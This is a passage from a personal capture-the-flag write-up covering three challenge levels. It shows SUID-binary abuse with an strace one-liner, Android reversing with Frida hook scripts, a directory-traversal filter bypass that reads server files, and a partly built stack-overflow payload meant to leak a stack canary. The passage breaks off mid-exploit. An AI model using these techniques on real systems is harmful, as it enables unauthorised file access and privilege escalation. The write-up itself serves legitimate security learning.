with PcapReader('macccdc253.pcap') as maccdc_packets, PcapReader('traffic253.pcap') as traffic_packets:
for maccdc_packet in maccdc_packets:
candidate_traffic_packet = traffic_packets.read_packet()
while maccdc_packet[TCP].payload != candidate_traffic_packet[TCP].payload:
print("NOMATCH {}".format(i))
candidate_traffic_packet = traffic_packets.read_packet()
if TCP not in candidate_traffic_packet:
print("NOMATCH {}".format(i))
candidate_traffic_packet = traffic_packets.read_packet()
i += 1
i += 1
This new script revealed that there were indeed more unique packets. These turned out to be a series of TCP SYN packets from 192.168.202.95
to 192.168.24.253
followed by an SSH connection!
Even better, the [PSH, ACK]
packet sent from the server after the port knocking sequence contained SSH credentials.
This was my ticket. I repeated the port knocking sequence with python .\knock.py <IP ADDRESS> 2928 12852 48293 9930 8283 42069
and I received the packet containing the SSH credentials. The credentials only lasted for a few seconds and changed on each iteration; I probably should have automated the SSH login but manually copying and pasting worked as well.
I logged in as the low-privileged challenjour
user. The home folder contained an otpkey
executable and secret.txt
. secret.txt
could only be read by root
, but otpkey
had the SUID bit set so it could read secret.txt
.
I pulled otpkey
from the server and decompiled it in IDA. I annotated the pseudocode accordingly:
__int64 __fastcall main(int a1, char **a2, char **a3)
{
int i; // eax
const char *encrypted_machine_id_hex; // rax
int can_open_dest_file; // [rsp+18h] [rbp-78h]
char *dest_file; // [rsp+20h] [rbp-70h]
char *source_file_bytes; // [rsp+28h] [rbp-68h]
char *dest_file_bytes; // [rsp+30h] [rbp-60h]
char *tmp_otk_file; // [rsp+38h] [rbp-58h]
const char *source_file; // [rsp+40h] [rbp-50h]
_BYTE *encrypted_machine_id; // [rsp+48h] [rbp-48h]
char tmp_otk_dir[16]; // [rsp+50h] [rbp-40h] BYREF
__int64 v14; // [rsp+60h] [rbp-30h]
__int64 v15; // [rsp+68h] [rbp-28h]
__int64 v16; // [rsp+70h] [rbp-20h]
__int16 v17; // [rsp+78h] [rbp-18h]
unsigned __int64 v18; // [rsp+88h] [rbp-8h]
v18 = __readfsqword(0x28u);
can_open_dest_file = 0;
dest_file = 0LL;
source_file_bytes = 0LL;
dest_file_bytes = 0LL;
tmp_otk_file = 0LL;
strcpy(tmp_otk_dir, "/tmp/otk/");
v14 = 0LL;
v15 = 0LL;
v16 = 0LL;
v17 = 0;
for ( i = getopt(a1, a2, "hm"); ; i = getopt(a1, a2, "hm") )
{
if ( i == -1 )
{
if ( a1 == 4 )
return 0LL;
}
else
{
if ( i != 109 ) // 'm' so opt is h instead
{
printf("Usage: %s [OPTIONS]\n", *a2);
puts("Print some text :)n");
puts("Options");
puts("=======");
puts("[-m] curr_location new_location \tMove a file from curr location to new location\n");
exit(0);
}
if ( a1 != 4 )
{
puts("[-m] curr_location new_location \tMove file from curr location to new location");
exit(0);
}
source_file = a2[2];
dest_file = a2[3];
printf("Requested to move %s to %s.\n", source_file, dest_file);
if ( (unsigned int)is_alpha(source_file) && (unsigned int)is_alpha(dest_file) )
{
if ( (unsigned int)check_needle(source_file) )// check if source file has 'secret.t'
can_open_dest_file = can_open(dest_file);
if ( can_open_dest_file )
{
source_file_bytes = (char *)read_bytes(source_file);
dest_file_bytes = (char *)read_bytes(dest_file);
if ( source_file_bytes && dest_file_bytes )
write_bytes_to_file(dest_file, source_file_bytes);
}
else
{
source_file_bytes = (char *)read_bytes(source_file);
if ( source_file_bytes )
{
write_bytes_to_file(dest_file, source_file_bytes);
chmod(dest_file, 0x180u);
}
}
}
}
encrypted_machine_id = encrypt_machine_id();
if ( encrypted_machine_id )
{
encrypted_machine_id_hex = (const char *)bytes_to_hex(encrypted_machine_id);
strncat(tmp_otk_dir, encrypted_machine_id_hex, 0x20uLL);// appends encrypted machine id to /tmp/otk/
tmp_otk_file = (char *)read_bytes(tmp_otk_dir);
if ( tmp_otk_file )
printf("%s", tmp_otk_file);
}
else
{
puts("An error occurred.");
}
free_wrapper(encrypted_machine_id);
free_wrapper(tmp_otk_file);
if ( !can_open_dest_file )
break;
write_bytes_to_file(dest_file, dest_file_bytes);// restores dest file...
free_wrapper(source_file_bytes);
free_wrapper(dest_file_bytes);
dest_file = 0LL;
}
return 0LL;
}
otpkey
moved a file from arg1
to arg2
. If arg1
was secret.txt
, the program wrote the contents of secret.txt
to the destination file, but before exiting it would also restore the destination file's original contents, preventing me from reading the flag. The section starting from encrypted_machine_id = encrypt_machine_id();
looked more intresting. It attempted to read /tmp/otk/<encrypt_machine_id()>
and print the contents of the file. Since this occurred before it restored the destination file, I could theoretically write secret.txt
to the OTK file and print its contents to get the flag!
What string did encrypt_machine_id
generate?
_BYTE *encrypt_machine_id()
{
size_t v0; // rax
size_t ciphertext_len; // rax
int i; // [rsp+0h] [rbp-80h]
void *machine_id; // [rsp+8h] [rbp-78h]
time_t current_time_reduced; // [rsp+10h] [rbp-70h]
char *_etc_machine_id; // [rsp+18h] [rbp-68h]
_BYTE *machine_id_unhexed; // [rsp+20h] [rbp-60h]
_BYTE *encrypted_machine_id; // [rsp+28h] [rbp-58h]
char *ciphertext; // [rsp+38h] [rbp-48h]
char plaintext[8]; // [rsp+46h] [rbp-3Ah] BYREF
__int16 v11; // [rsp+4Eh] [rbp-32h]
__int64 v12[2]; // [rsp+50h] [rbp-30h] BYREF
__int64 md5_hash[4]; // [rsp+60h] [rbp-20h] BYREF
md5_hash[3] = __readfsqword(0x28u);
*(_QWORD *)plaintext = 0LL;
v11 = 0;
v12[0] = 0x13111D5F1304155FLL;
v12[1] = 0x14195D151E1918LL;
encrypted_machine_id = calloc(0x10uLL, 1uLL);
md5_hash[0] = 0LL;
md5_hash[1] = 0LL;
current_time_reduced = time(0LL) / 10;
snprintf(plaintext, 0xAuLL, "%ld", current_time_reduced);
v0 = strlen(plaintext);
ciphertext = (char *)calloc(4 * v0, 1uLL);
RC4("O).2@g", plaintext, ciphertext);
strlen(plaintext);
ciphertext_len = strlen(ciphertext);
MD5(ciphertext, ciphertext_len, md5_hash);
free_wrapper(ciphertext);
_etc_machine_id = xor_0x70((const char *)v12);// xor_0x70
machine_id = read_bytes(_etc_machine_id); // fb60706a312b4ddab835445d28153227
free_wrapper(_etc_machine_id);
if ( !machine_id )
return 0LL;
machine_id_unhexed = (_BYTE *)read_hex_string(machine_id);
if ( !machine_id_unhexed || !encrypted_machine_id )
return 0LL;
for ( i = 0; i <= 15; ++i )
encrypted_machine_id[i] = machine_id_unhexed[i] ^ *((_BYTE *)md5_hash + i);// xor with each byte of weak md5_hash
free_wrapper(machine_id_unhexed);
return encrypted_machine_id;
}
By following the pseudocode, I deduced that the function generated the one-time key using XOR(MD5(RC4(str(time(0LL) / 10, "O).2@g")), machine-id)
. Since it divided time(0)
by 10, each one-time key lasted for ten seconds.
At first, I tried generating the one-time key myself but the output did not match anthing in /tmp/otk
. After several more failed attempts, I realised that I could simply use strace
to dynamically read otpkey
's system calls. When otpkey
attempted to read /tmp/otk/<encrypt_machine_id()>
, strace
hooked the read
system call and printed its file path argument.
Since the server had already installed strace
, I crafted a Bash one-liner to do this: dest=$(strace ./otpkey -m secret.txt /tmp/ptl 2>&1 | grep /tmp/otk | cut -c 19-59);./otpkey -m secret.txt $dest
. With that, I solved the challenge.
TISC{v3RY|53CrE+f|@G}
Level 7: The Secret
Domains: Steganography, Android Security, Cryptography
Our investigators have recovered this email sent out by an exposed PALINDROME hacker, alias: Natasha. It looks like some form of covert communication between her and PALINDROME.
Decipher the communications channel between them quickly to uncover the hidden message, before it is too late.
Submit your flag in the format: TISC{flag found}.
Bye for now.eml
Bye for now.eml
contained the following text:
GIB,
I=E2=80=99ll be away for a while. Don=E2=80=99t miss me. You have my pictur=
e :D
Hope the distance between us could help me see life from a different
perspective. Sometimes, you will find the most valuable things hidden in
the least significant places.
Natasha
My hex editor revealed a large base64 string appended as a HTML comment. Decoding the string produced a PNG image file of Natasha Romanoff from the Avengers. Based on the “least significant places” hint from the email message, I suspected that the image embedded data using least sigificant byte steganography. I confirmed this with stegsolve
as the plane 0 filters displayed the tell-tale “static” at the top of the image.
I used the stegonline tool to retrieve the bytes, which formed the string https://transfer.ttyusb.dev/8S8P76hlG6yEig2ywKOiC6QMak4iGaKc/data.zip
.
The link downloaded a password-protected ZIP file containing an app.apk
file. The ZIP file included an extra comment at the bottom: LOBOBMEM MULEBES ULUD RIKIF GNIKCARC EROFEB NIAGA KNIHT
. I reversed the string and got THINK AGAIN BEFORE CRACKING FIKIR DULU SEBELUM MEMBOBOL
.
Despite such fine advice, I responded in a predictable manner:
After wasting several hours trying to guess and crack the password, I came across a useful CTF guide that revealed that ZIPs could be pseudo-encrypted by setting the encryption flag without actually encrypting the data. I modified the corresponding byte in my hex editor and lo and behold, I opened the ZIP without a password!
I installed the APK on my test Android phone and opened it.
Clicking “I'M IN POSITION” caused the application to close because the time, latitude, longitude, and data were invalid.
I decompiled the APK with jadx
and noticed that the MainActivity
function initialised the Myth
class, which then executed System.loadLibrary("native-lib")
. This corresponded with libnative-lib.so
in the APK's lib
folder, so I decompiled it IDA. The library exported two interesting functions: Java_mobi_thesecret_Myth_getTruth
and Java_mobi_thesecret_Myth_getNextPlace
.
Java_mobi_thesecret_Myth_getTruth
performed a large number of _mm_shuffle_epi32
decryption routines before returning some plaintext which I suspected was the flag. It also verified that the second argument matched GIB's phone
:
v7 = (const char *)(*(int (__cdecl **)(int *, int, char *))(*a4 + 676))(a4, a7, &v74);
v8 = strcmp(v7, "GIB's phone") == 0;
Meanwhile, Java_mobi_thesecret_Myth_getNextPlace
checked latitude and longitude values:
if ( *(double *)&a5 > 103.7899 || *(double *)&a4 < 1.285 || *(double *)&a4 > 1.299 || *(double *)&a5 < 103.78 )
{
v10 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Not near. Try again.");
}
It also compared the second argument to a matching time value:
if ( v7 == 22 && v8 > 30 || v7 == 23 && v8 < 15 )
{
std::string::append((int)v20, (int)&all, 71, 1u);
std::string::append((int)v20, (int)&all, 83, 1u);
std::string::append((int)v20, (int)&all, 83, 1u);
std::string::append((int)v20, (int)&all, 79, 1u);
std::string::append((int)v20, (int)&all, 82, 1u);
std::string::append((int)v20, (int)&all, 25, 1u);
std::string::append((int)v20, (int)&all, 14, 1u);
std::string::append((int)v20, (int)&all, 14, 1u);
std::string::append((int)v20, (int)&all, 83, 1u);
std::string::append((int)v20, (int)&all, 13, 1u);
std::string::append((int)v20, (int)&all, 76, 1u);
std::string::append((int)v20, (int)&all, 68, 1u);
std::string::append((int)v20, (int)&all, 14, 1u);
std::string::append((int)v20, (int)&all, 47, 1u);
std::string::append((int)v20, (int)&all, 32, 1u);
std::string::append((int)v20, (int)&all, 43, 1u);
std::string::append((int)v20, (int)&all, 40, 1u);
std::string::append((int)v20, (int)&all, 45, 1u);
std::string::append((int)v20, (int)&all, 35, 1u);
std::string::append((int)v20, (int)&all, 49, 1u);
std::string::append((int)v20, (int)&all, 46, 1u);
std::string::append((int)v20, (int)&all, 44, 1u);
std::string::append((int)v20, (int)&all, 36, 1u);
std::string::append((int)v20, (int)&all, 50, 1u);
std::string::append((int)v20, (int)&all, 83, 1u);
std::string::append((int)v20, (int)&all, 64, 1u);
std::string::append((int)v20, (int)&all, 75, 1u);
std::string::append((int)v20, (int)&all, 74, 1u);
std::string::append((int)v20, (int)&all, 68, 1u);
std::string::append((int)v20, (int)&all, 81, 1u);
if ( (v20[0] & 1) != 0 )
v9 = (char *)v21;
else
v9 = (char *)v20 + 1;
v11 = (*(int (__cdecl **)(int, char *))(*(_DWORD *)a1 + 668))(a1, v9);
}
else
{
v11 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Wrong time. Try again.");
}
Next, I grepped through the decompiled Java code and found that getTruth
and getNextPlace
were called in f/a/b.java
:
q.a(new g(0, "http://worldtimeapi.org/api/timezone/Etc/UTC", null, new c(mainActivity, textView), new f(textView)));
String str2 = mainActivity.u;
boolean z = true;
if (!(str2 == null || str2.length() == 0)) {
String nextPlace = mainActivity.y.getNextPlace(mainActivity.u, mainActivity.s, mainActivity.t);
mainActivity.v = nextPlace;
if (nextPlace == null || nextPlace.length() == 0) {
mainActivity.x();
} else {
if (c.b.a.b.a.H(mainActivity.v, "Error", false, 2)) {
mainActivity.x();
context = mainActivity.getApplicationContext();
str = mainActivity.v;
} else {
p q2 = f.q(mainActivity);
View findViewById4 = mainActivity.findViewById(R.id.data_text);
c.c(findViewById4, "findViewById(R.id.data_text)");
TextView textView2 = (TextView) findViewById4;
q2.a(new k(0, mainActivity.v, new g(mainActivity, textView2), new e(textView2)));
String str3 = mainActivity.w;
if (!(str3 == null || str3.length() == 0) || mainActivity.x != 0) {
int i2 = mainActivity.x;
if (i2 == 1) {
View findViewById5 = mainActivity.findViewById(R.id.flag_value);
c.c(findViewById5, "findViewById(R.id.flag_value)");
TextView textView3 = (TextView) findViewById5;
String string = Settings.Global.getString(mainActivity.getContentResolver(), "device_name");
if (!(string == null || string.length() == 0)) {
z = false;
}
if (z) {
string = Settings.Global.getString(mainActivity.getContentResolver(), "bluetooth_name");
}
Myth myth = mainActivity.y;
String str4 = mainActivity.w;
c.c(string, "user");
String truth = myth.getTruth(str4, string);
if (c.b.a.b.a.H(truth, "Error", false, 2)) {
Toast.makeText(mainActivity.getApplicationContext(), truth, 0).show();
return;
} else {
textView3.setText(truth);
return;
}
By tracing back variables using the jadx
GUI “Find Usage” option, I reconstructed the flow of the application. mainActivity.y.getNextPlace
took in the current timestamp from http://worldtimeapi.org/api/timezone/Etc/UTC
(parsed to HH:MM) and the latitude and longitude, returning a link. After that, the application called myth.getTruth
with str4
and the current username as arguments. Since the IDA decompilation already revealed that the user value needed to be GIB's phone
, I only needed to find out the expected value of str4
.
The decompiled Java code showed that String str4 = mainActivity.w;
and mainActivity.w
was set in f/a/g.java
by the a
function:
public final void a(Object obj) {
MainActivity mainActivity = this.a;
TextView textView = this.f2157b;
String str = (String) obj;
int i = MainActivity.q;
c.d(mainActivity, "this$0");
c.d(textView, "$dataTextView");
try {
c.c(str, "response");
int e2 = e.e(str, "tgme_page_description", 0, true, 2);
String str2 = (String) e.g(str.subSequence(e2, e.b(str, "</div>", e2, true)), new String[]{">"}, false, 0, 6).get(1);
mainActivity.w = str2;
textView.setText(str2);
mainActivity.x = 1;
} catch (Exception unused) {
mainActivity.x = -1;
}
}
I looked up tgme_page_description
and learned that this was the HTML class for the description text in a Telegram group page.
I moved on to dynamic instrumentation with Frida and wrote a quick script to trigger getNextPlace
directly in the application with the correct arguments.
function exploit() {
// Check if frida has located the JNI
if (Java.available) {
// Switch to the Java context
Java.perform(function() {
const Myth = Java.use('mobi.thesecret.Myth');
var myth = Myth.$new();
var string_class = Java.use("java.lang.String");
var out = string_class.$new("");
var timestamp = string_class.$new("22:31");
out = myth.getNextPlace(timestamp, 1.286, 103.785);
console.log(out)
}
)}
}
I executed this script via my connected computer with frida -U 'The Secret' -l exploit.js
. To my pleasant surprise, getNextPlace
returned a Telegram link: https://t.me/PALINDROMEStalker. The description box displayed the string I was looking for: ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV
.
Now all I had to do was to feed getTruth
the correct arguments.
function exploit() {
// Check if frida has located the JNI
if (Java.available) {
// Switch to the Java context
Java.perform(function() {
const Myth = Java.use('mobi.thesecret.Myth');
var myth = Myth.$new();
var string_class = Java.use("java.lang.String");
var out = string_class.$new("");
var timestamp = string_class.$new("22:31");
var tele_description = string_class.$new("ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV");
var user = string_class.$new("GIB's phone");
out = myth.getNextPlace(timestamp, 1.286, 103.785);
console.log(out)
out = myth.getTruth(tele_description, user);
console.log(out)
}
)}
}
The script printed the flag and completed this challenge.
TISC{YELENAFOUNDAWAYINSHEISOUREYESANDEARSWITHIN}
Level 8: Get-Shwifty
Domains: Web, Reverse Engineering, Pwn
We have managed to track down one of PALINDROME's recruitment operations!
Our intel suggest that they have defaced our website and insert their own recruitment test.
Pass their test and get us further into their organization!
We are counting on you!
The following links are mirrors of each other, flags are the same:
http://tisc21c-v3clxv6ecfdrvyrzn5mz7mchv8v7wcpv.ctf.sg:42651
http://tisc21c-8pz0kdhumzaj1lthraa6tm6t27righ8y.ctf.sg:42651
http://tisc21c-wwhvyoobqg08oegfsdvnmcflgfsbx0xd.ctf.sg:42651
NOTE: THE CHALLENGE DOES NOT INVOLVE EXTERNAL LINKS THAT MAY OR MAY NOT BE FOUND IN THE PROVIDED WEBSITE.
I finally reached the Elite Three. From this point onwards, the level of difficulty racheted up greatly and took significant effort to crack. I groaned internally when I saw that Level 8 was a Pwn challenge: while I understood the basics of Windows binary exploitation, I lacked confidence in Linux exploitation and had never completed a Pwn CTF challenge before. Nevertheless, this was the only thing standing in the way of the first $10k.
I opened the link to the hacked website.
I inspected the HTML source code and noticed a commented-out Find out more about the PALINDROME
link. The link redirected to /hint/?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
which contained a single picture.
What other hint hash had I found...? I began fuzzing the hash query parameter and noticed that hash=./aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
returned the same picture. This suggested a file traversal vulnerability. However, attempting to go straight to ../../../../etc/passwd
failed. I worked incrementally by traversing backwards one directory at a time and discovered that the application blacklisted three consecutive traversals (../../../
). To bypass this, I simply used ../.././../
which successfully allowed me to access any file on the server! The page returned the file data as a base64-encoded image source.
<!DOCTYPE html>
<html lang="en">
<head>
<title>lol</title>
</head>
<body>
<img src='data:image/png;base64,<BASE64 ENCODED FILE DATA>'>
Unfortunately, I did not find any interesting information in /etc/passwd
or /etc/hosts
. Eventually, I decided to check the source code of the website's pages which turned out to be PHP. I struck gold with /var//www/html/hint/index.php
:
<!DOCTYPE html>
<html lang="en">
<head>
<title>lol</title>
</head>
<body>
<?php
if($_GET["hash"]){
echo "<img src='data:image/png;base64,".base64_encode(file_get_contents($_GET["hash"]))."'>";
die();
}else{
header("Location: /hint?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d");
die();
}
// to the furure me: this is the old directory listing
//
// hint:
// total 512
// drwxrwxr-x 2 user user 4096 Jun 16 21:52 ./
// drwxr-xr-x 5 user user 4096 Jun 16 21:11 ../
// -rw-rw-r-- 1 user user 18 Jun 16 22:12 68a64066b1f37468f5191d627473891ac0ef9243
// -rw-rw-r-- 1 user user 489519 Jun 16 15:47 aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
// -rw-rw-r-- 1 user user 15710 Jun 16 21:52 b5dbffb4375997bfcba86c4cd67d74c7aef2b14e
// -rw-r--r-- 1 user user 551 Jun 16 21:30 index.php
?>
</body>
</html>
Following the directory listing, I accessed two new files.
68a64066b1f37468f5191d627473891ac0ef9243
was a text file that said i am also on 53619
.
b5dbffb4375997bfcba86c4cd67d74c7aef2b14e
contained another directory listing.
bin:
total 28
-rwsrwxr-x 1 root root 22752 Aug 19 15:59 1adb53a4b156cef3bf91c933d2255ef30720c34f
I proceeded to leak /var/www/html/bin/1adb53a4b156cef3bf91c933d2255ef30720c34f
which turned out to be an ELF executable.
As described in the text file earlier, this binary ran on port 53619 on the server. I executed it locally and was greeted by a large alien head.
___
. -^ `--,
/# =========`-_
/# (--====___====\
/# .- --. . --.|
/## | * ) ( * ),
|## \ /\ \ / |
|### --- \ --- |
|#### ___) #|
|###### ##|
\##### ---------- /
\#### (
`\### |
\### |
\## |
\###. .)
`======/
SHOW ME WHAT YOU GOT!!!
////////////// MENU //////////////
// 0. Help //
// 1. Do Sanity Test //
// 2. Get Recruited //
// 3. Exit Program //
//////////////////////////////////
The “Do Sanity Test” option prompted me for input.
To pass the sanity test, you just need to give a sane answer to show that you are not insane!
Your answer:
After entering some random text, I tried the “Get Recruited” option. However, the application printed the error message You must be insane! Complete the Sanity Test to prove your sanity first!
.
To figure out what was going on, I decompiled the application in IDA and annotated the pseudocode for the “Do Sanity Test” option.
__int64 sanity_test()
{
void *v0; // rsp
void *v1; // rsp
void *v2; // rsp
int v4; // [rsp+14h] [rbp-24h] BYREF
void *s; // [rsp+18h] [rbp-20h]
void *src; // [rsp+20h] [rbp-18h]
void *dest; // [rsp+28h] [rbp-10h]
unsigned __int64 v8; // [rsp+30h] [rbp-8h]
v8 = __readfsqword(0x28u);
++dword_5580E5357280;
v4 = 32;
v0 = alloca(48LL);
s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
v1 = alloca(48LL);
src = s;
v2 = alloca(48LL);
dest = s;
memset(s, 0, v4);
memset(src, 0, v4);
memset(dest, 0, v4);
std::operator>><char,std::char_traits<char>>(&std::cin, src);
memcpy(dest, src, v4);
memcpy(s, dest, v4 / 2);
sanity_test_input = malloc(v4 - 1);
memcpy(sanity_test_input, s, v4 - 1);
sanity_test_result = *((_BYTE *)s + v4 - 1);
return 0LL;
}
Following a series of three suspicious memcpy
s, the function set sanity_test_result
to the 32nd byte of the input. Next, the “Get Recruited” function checked if sanity_test_result && !(unsigned int8)shl_sanity_test_result_7()
. In other words, to pass the sanity test, I had to enter input such that sanity_test_result != 0
and (unsigned __int8)(sanity_test_result << 7) = 0
. I could pass this check rather easily with an even number, such as 0x40
(@
in ASCII). Now, instead of displaying an error message, the “Get Recruited” option prompted me for a different set of inputs.
To get recruited, you need to provide the correct passphrase for the Cromulon.
Passphrase: AAA
Your passphrase appears to be incorrect.
You are allowed a few tries to modify your passphrase.
Use the following functions to provide the correct answer to get recruited.
1. Append String
2. Replace Appended String
3. Modify Appended String
4. Show what you have for the Cromulon currently
5. Submit
6. Back
The various options looked ripe for some kind of use-after-free vulnerability... except that there were not a lot of free
s going on. The binary handled the appended strings using a linked list and I could not find any issues in the memory management. I also suspected that it suffered from a format string bug because entering %x%x%x
for the passphrase caused the “Show what you have for the Cromulon currently” option to print e8e8e8e8
. However, after further reverse engineering, I realised I misunderstood the source of the strange output. It turned out that when appending, replacing, or modifying a string, the user's input would be XORed with the input from the sanity test before it was stored in the linked list. For example, since I entered a series of @
s for the the sanity test, @@ XOR %x == e8
.
char __fastcall xor_passphrase_with_sanity_input(_BYTE *passphrase_data)
{
char result; // al
_BYTE *v2; // rax
_BYTE *passphrase_data_2; // [rsp+0h] [rbp-18h]
_BYTE *v4; // [rsp+10h] [rbp-8h]
passphrase_data_2 = passphrase_data;
v4 = sanity_test_input;
result = *passphrase_data;
if ( *passphrase_data )
{
result = *(_BYTE *)sanity_test_input;
if ( *(_BYTE *)sanity_test_input )
{
do
{
if ( !*v4 )
v4 = sanity_test_input;
v2 = v4++;
*passphrase_data_2++ ^= *v2;
result = *passphrase_data_2 != 0;
}
while ( *passphrase_data_2 );
}
}
return result;
}
This behaviour resembled an information leak, so perhaps the actual vulnerability occurred in the sanity test. Remember the suspicious series of memcpy
s?
I started the application in gdb
with the pwndbg
extension and entered a long series of A
s for the sanity test. I got a crash and traced it back to the first memcpy
. The arguments to memcpy
were overwritten by my input:
dest: 0x4141414141414141 ('AAAAAAAA')
src: 0x4141414141414141 ('AAAAAAAA')
n: 0x41414141 ('AAAA')
This looked like a powerful write-what-where gadget! However, exploitation would not be easy. I ran checksec
and confirmed that all possible memory protections were turned on, therefore ruling out a simple return pointer overwrite exploit.
pwndbg> checksec
[*] '/home/kali/Desktop/tisc/8_get_shwifty/1adb53a4b156cef3bf91c933d2255ef30720c34f'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
I took a closer look at sanity test pseudocode to figure out another way to exploit this overwrite.
void *v0; // rsp
void *v1; // rsp
void *v2; // rsp
int v4; // [rsp+14h] [rbp-24h] BYREF
void *s; // [rsp+18h] [rbp-20h]
void *src; // [rsp+20h] [rbp-18h]
void *dest; // [rsp+28h] [rbp-10h]
unsigned __int64 v8; // [rsp+30h] [rbp-8h]
v8 = __readfsqword(0x28u);
++dword_5580E5357280;
v4 = 32;
v0 = alloca(48LL);
s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
v1 = alloca(48LL);
src = s;
v2 = alloca(48LL);
dest = s;
memset(s, 0, v4);
memset(src, 0, v4);
memset(dest, 0, v4);
std::operator>><char,std::char_traits<char>>(&std::cin, src);
memcpy(dest, src, v4);
memcpy(s, dest, v4 / 2);
sanity_test_input = malloc(v4 - 1);
memcpy(sanity_test_input, s, v4 - 1);
sanity_test_result = *((_BYTE *)s + v4 - 1);
return 0LL;
The alloca
and memcpy
calls were run in a precise order. I set a breakpoint at the first memcpy
and triggered the overflow again to analyse the stack. After a few repetitions, I figured out how the overflow worked. At the memcpy
breakpoint, the stack looked like this:
00: 0x00000000 0x00000000 0x00000000 0x00000000 < *1st memcpy dst / *2nd memcpy src
10: 0x00000000 0x00000000 0x00000000 0x00000000
20: 0x00000000 0x00000000 0xaf79a963 0x00007fab
30: 0x41414141 0x41414141 0x41414141 0x41414141 < *1st memcpy src / start of user-controlled input
40: 0x41414141 0x41414141 0x41414141 0x41414141
50: 0x41414141 0x41414141 0x41414141 0x41414141
60: 0x41414141 0x41414141 0x41414141 0x41414141 < *2nd memcpy dst
70: 0x41414141 0x41414141 0x41414141 0x41414141
80: 0x41414141 0x41414141 0x41414141 0x41414141
90: 0x41414141 0x41414141 0x41414141 0x00000030 < 12 bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
a0: 0x5d7d2b60 0x00007ffc 0x5d7d2b30 0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
b0: 0x5d7d2b00 0x00007ffc 0x48531900 0xa14ea5c4 < 1st memcpy dst / 2nd memcpy src | stack canary
c0: 0x5d7d2bf0 0x00007ffc 0x86bfeea2 0x0000563e < 8 bytes | return pointer
d0: 0x86c00010 0x0000563e 0x86bfd540 0x0001013e
e0: 0x86c01956 0x0000563e 0x48531900 0xa14ea5c4
If I overwrote every byte until the return pointer, I would also overwrite the stack canary which triggered an error. However, remember how the inputs for the “Get Recruited” functions were XORed with sanity_test_input
? Since I controlled each of the three memcpy
s' arguments via the overwrite, I could attempt to copy the stack canary into sanity_test_input
using the third memcpy
, then retrieve the XORed canary via the “Show what you have for the Cromulon currently” function.
Initially, I planned to overwrite the bytes up till the first memcpy
n
argument and set n
to a large enough number to also copy over the stack canary bytes. However, since the second memcpy
used n / 2
for the size argument, to ensure that the canary was copied over in the second memcpy
, n
needed to be so large that the first memcpy
would already overwrite the stack canary. Worse, I also realised that the copied bytes had to be null-free because the xor_passphrase_with_sanity_input
function only XORed the appended strings up till the first null byte in sanity_test_input
. It dawned on me that I had to thread a very fine needle; this challenge was surgically designed.
(I would later learn that this was in fact the hardest possible way I could have solved this challenge; there was a simpler stack setup as well as a heap exploit route but clearly I wanted to suffer more.)
In order to properly leak data from the stack, I needed to overwrite the bytes in such a way that the 3rd memcpy
copied over stack bytes into sanity_test_input
that would both pass the sanity test AND be XORed later on. I tested various permutations of overwritten bytes, using pwntools
to speed up my work. To quickly debug the program, I wrote a Bash one-liner: gdb ./1adb53a4b156cef3bf91c933d2255ef30720c34f $(ps aux | grep ./1adb53a4b156cef3bf91c933d2255ef30720c34f | grep -v grep | cut -d ' ' -f9)
. This would hook onto the running instance created by my pwntools
script.
After painstakingly trying hundreds of different inputs over several hours, I eventually figured out an overwrite that would get the result I wanted. By crafting my payload with precise offsets, I could manipulate the first two memcpy
s such that I overwrote the last byte in the 3rd memcpy
's src
argument on the stack. With luck, the overwritten byte would cause the src
to point to the return address or any other desired value such as the canary. I needed luck because the stack addresses changed each time the binary was executed. As such, I had to brute force the correct offset.
It may be easier to explain this by stepping through each memcpy
, so let's get right into it.
I prepared my payload like this:
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # third memcpy n; vary this until sanity test passes
payload += packing.p8(return_pointer_offset) # candidate offset to return pointer on stack
payload += b'B' * 43 # more offset
payload += b'\x82' # first memcpy n / second memcpy n * 2
p.sendline(payload)
With this payload, the stack BEFORE the first memcpy
looked like this:
75d0: 0x00000000 0x00000000 0x00000000 0x00000000 < *1st memcpy dst / *2nd memcpy src
75e0: 0x00000000 0x00000000 0x00000000 0x00000000
75f0: 0x00000000 0x00000000 0x656c2963 0x00007fca < 8 null bytes | libc_write+19
7600: 0x41414141 0x41414141 0x41414141 0x41414141 < *1st memcpy src / start of user-controlled input
7610: 0x41414141 0x41414141 0x41414141 0x41414141
7620: 0x41414141 0x41414141 0x41414141 0x41414141
7630: 0x41414141 0x41414141 0x41414141 0x00000011 < *2nd memcpy dst
7640: 0x424242XX 0x41414141 0x41414141 0x41414141 < candidate XX offset
7650: 0x41414141 0x41414141 0x41414141 0x41414141
7660: 0x41414141 0x41414141 0x41414141 0x00000082 < 12 filler bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630 0x00007ffc 0xb5617600 0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0 0x00007ffc 0xd1686300 0x697ee648 < 1st memcpy dst / 2nd memcpy src | stack canary
7690: 0xb56176c0 0x00007ffc 0x2b782ea2 0x00005597 < stack pointer | return pointer
76a0: 0x2b784010 0x00005597 0x2b781540 0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956 0x00005597 0xd1686300 0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010 0x00005597 0x655fbe4a 0x00007fca < _libc_csu_init | __libc_start_main+234
Thanks to the overflow from receiving user input, I overwrote the value of n
on the stack to \x82
. This caused the first memcpy
to copy both my original inputs and additional bytes on the stack to *1st memcpy dst
. The stack AFTER the first memcpy
and BEFORE the second memcpy
now looked like this:
75d0: 0x41414141 0x41414141 0x41414141 0x41414141 < *2nd memcpy src
75e0: 0x41414141 0x41414141 0x41414141 0x41414141
